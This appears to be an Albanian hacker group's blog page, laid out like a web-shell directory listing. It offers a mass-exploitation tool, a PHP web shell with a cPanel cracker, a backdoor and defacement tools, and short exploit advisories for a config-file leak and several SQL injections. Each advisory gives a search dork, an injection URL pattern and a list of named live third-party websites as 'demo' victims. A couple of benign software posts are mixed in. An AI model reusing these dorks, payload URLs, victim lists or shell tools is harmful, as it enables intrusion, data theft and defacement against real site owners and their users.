RetnO
today : | at : (GMT+7)
Server IP : (Unknown) | Your IP :
safemode : ON
> / home / retno / public_html / retnohack.blogspot.com / drwxr-x--- [ home ]
name author perms com modified label

Hyperbook guestbook v1.30 Mass Exploiting RetnO rwxr-xr-x 0 5:26 AM

Filename Hyperbook guestbook v1.30 Mass Exploiting
Permission rw-r--r--
Author RetnO
Date and Time 5:26 AM
Label
Action

Hyperbook guestbook v1.30 Mass Exploiting



Features :

# Exploiter
Exploit all vuln sites
# Find DB Panel
Find the Database Login Panel
#Exploit Dorks
Dork to use to find vuln sites
# Domains 2 IP
Scan website ip
Download : Click Here

Albanian IPTV Android APP RetnO rwxr-xr-x 0 3:49 AM

Filename Albanian IPTV Android APP
Permission rw-r--r--
Author RetnO
Date and Time 3:49 AM
Label
Action
Whatch online streaming Albanian TV channels on your android Device

Avable on links below
Download @ Amazon Download @ Aptoide

PHP Quiz - Read Config Vulnerability RetnO rwxr-xr-x 0 10:27 AM

Filename PHP Quiz - Read Config Vulnerability
Permission rw-r--r--
Author RetnO
Date and Time 10:27 AM
Label
Action
Author: RetnOHacK
Team: Procoderz Team Albania
Exploit Title:  php quiz o matic by matt hughes Read Config Vulnerability
Date: 26-03-2013
Category: WebApp
Google Dork: php quiz o matic by matt hughes
Bing Drok: Warning: file(): Filename cannot be empty in  /variables.inc
Tested on: Linux

Exploit:
site.xx/path/quiz/variables.inc

Demo:
http://www.nvak.no/misc/quiz/variables.inc
http://www.ac3.org/KKY_News/quizzes/variables.inc
http://www.nienteansia.it/quiz/variables.inc
http://www.tropicalweather.net/variables.inc
http://www.noanxiety.com/quizzes/variables.inc
http://www.brownteal.com/site/variables.inc
http://www.gomyson.com/mytest/variables.inc

Greetz: Hackforums.al, Madleets, WildClique, KHS, **RoAd_KiLlEr**,
TUNISIAN CYBER, Danzel, Dr.Z0mbie, н4χ0яℓ1ƒ3,
Hitcher, Cyberw0rM, CyberCoders, BackdoorMan, OverLoad, and all my friends

source : http://www.exploit4arab.net/exploits/453

Easy Forum Sql Injection Vulnerablity RetnO rwxr-xr-x 0 10:25 AM

Filename Easy Forum Sql Injection Vulnerablity
Permission rw-r--r--
Author RetnO
Date and Time 10:25 AM
Label
Action
Vulnerability info

Title: Easy Forum Sql Injection Vulnerablity
Vendor: http://www.sharewareconnection.com/easy-forum.htm
Date: 18/10/2012
Author: RetnOHacK #Procoder'z Team Albania
Email: RetnOHacK1@gmail.com , fb.me/root.procoderz
Category: Webapps
Dork: inurl:"board/read.php?id=1"
Tested on:   Windows xp , Ubuntu BT~5
           
Vulnerability Details

Exploit:

www.site.com/board/read.php?id=[SQL]'


Demo site:   http://www.heatsink-guide.com/board/read.php?id=1'
                http://laeom137.woobi.co.kr/board/read.php?id=1'
                http://www.echoice.co.kr/board/read.php?id=1'

Greetz to : all my friends Special www.procoderz.com members

source : http://www.exploit4ar.com/exploits/225

AlstraSoft Template Sql Injection Vulnerablity RetnO rwxr-xr-x 0 10:23 AM

Filename AlstraSoft Template Sql Injection Vulnerablity
Permission rw-r--r--
Author RetnO
Date and Time 10:23 AM
Label
Action
Vulnerability info

Title    : AlstraSoft Template Sql Injection Vulnerablity
Vendor   : http://www.alstrasoft.com/
Category : Webapps
Author   : RetnOHacK #Procoder'z Team Albanian
Email    : RetnOHacK1@gmail.com , fb.me/root.procoderz
Date     : 26/6/12
Dork     : inurl:"buy.php?tempid="
Demo     : http://www.blizsoft.com/templates/buy.php?tempid=4'
      http://www.chequalityhost.info/chetemplates/buy.php?tempid=1'
      http://www.webtemplatesresource.com/buy.php?tempid=1'

Vulnerability Details

Exploit/p0c:

www.site.com/templates/buy.php?tempid=[SQL]'

Greetz to : Mataty501, dA3m0n, wino, b4ti, R-t33n, 0x0, **RoAd_KiLlEr** & U

source : http://www.exploit4arab.net/exploits/152

Restu menu Sql Vulnerability RetnO rwxr-xr-x 0 10:21 AM

Filename Restu menu Sql Vulnerability
Permission rw-r--r--
Author RetnO
Date and Time 10:21 AM
Label
Action
Vulnerability info

Title:  Restu menu Sql Vulnerability
Vendor:  http://www.flickmedialtd.com/
Date:  25/06/2012
Author:  RetnOHacK #Procoder'z Team Albania
Email:  RetnOHacK1@gmail.com , fb.me/root.procoderz
Category:  Webapps
Dork:  inurl:"/cmsadmin/" intext:"version-1.6.6"
Tested on:   Windows xp , Ubuntu BT~5

Vulnerability Details

Input passed via the "menu_id" parameter in image.php is not properly sanitised before being used in SQL queries.
So we can use it to inject our own SQL Code.

Exploit/p0c:

www.site.com/cmsadmin/plugins/Resturant_menu/image.php?menu_id=[SQL]'

Demo site:   http://www.dhakahandicrafts.com/cmsadmin/plugins/product/image.php?menu_id=63'
                http://www.baburchi.biz/cmsadmin/plugins/Resturant_menu/image.php?menu_id=93'
                http://www.lagateau.co.uk/cmsadmin/plugins/Resturant_menu/image.php?menu_id=2'

Greetz to : Mataty501, dA3m0n, wino, b4ti, R-t33n, 0x0, **RoAd_KiLlEr** & U

source : http://www.exploit4arab.net/exploits/151

Pro$helL v2.0 RetnO rwxr-xr-x 0 10:19 AM

Filename Pro$helL v2.0
Permission rw-r--r--
Author RetnO
Date and Time 10:19 AM
Label
Action
















Pro$helL v2.0 Released
Tools :
./config k1ller
root/home
symlink
./tools
Joomla Index Changer
Wordpress Index Changer
Cpanel Cracker
Sql Scanner
Joomla Bruter
Backdoor
Joomla Server Scanner
Wordpress Server Scanner
Admin Finder
Shell Finder
./uploader and
./terminal
Download : http://sourceforge.net/projects/procoderz/files/php/proshell2.php/download

Down Or Not 1.0 RetnO rwxr-xr-x 0 10:08 AM

Filename Down Or Not 1.0
Permission rw-r--r--
Author RetnO
Date and Time 10:08 AM
Label
Action












Down or not ?
check websites if they are up or down using this software.
© Procoderz Team Albania 2013 - www.procoderz.sf.net
download link : http://sourceforge.net/projects/downornot/
Video : http://www.youtube.com/watch?v=Rc4EPOVit60